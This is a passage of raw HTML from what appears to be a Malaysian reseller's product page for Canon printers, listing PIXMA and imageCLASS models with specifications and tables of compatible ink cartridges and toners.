E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p><br />ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p><br />Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p><br />Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment 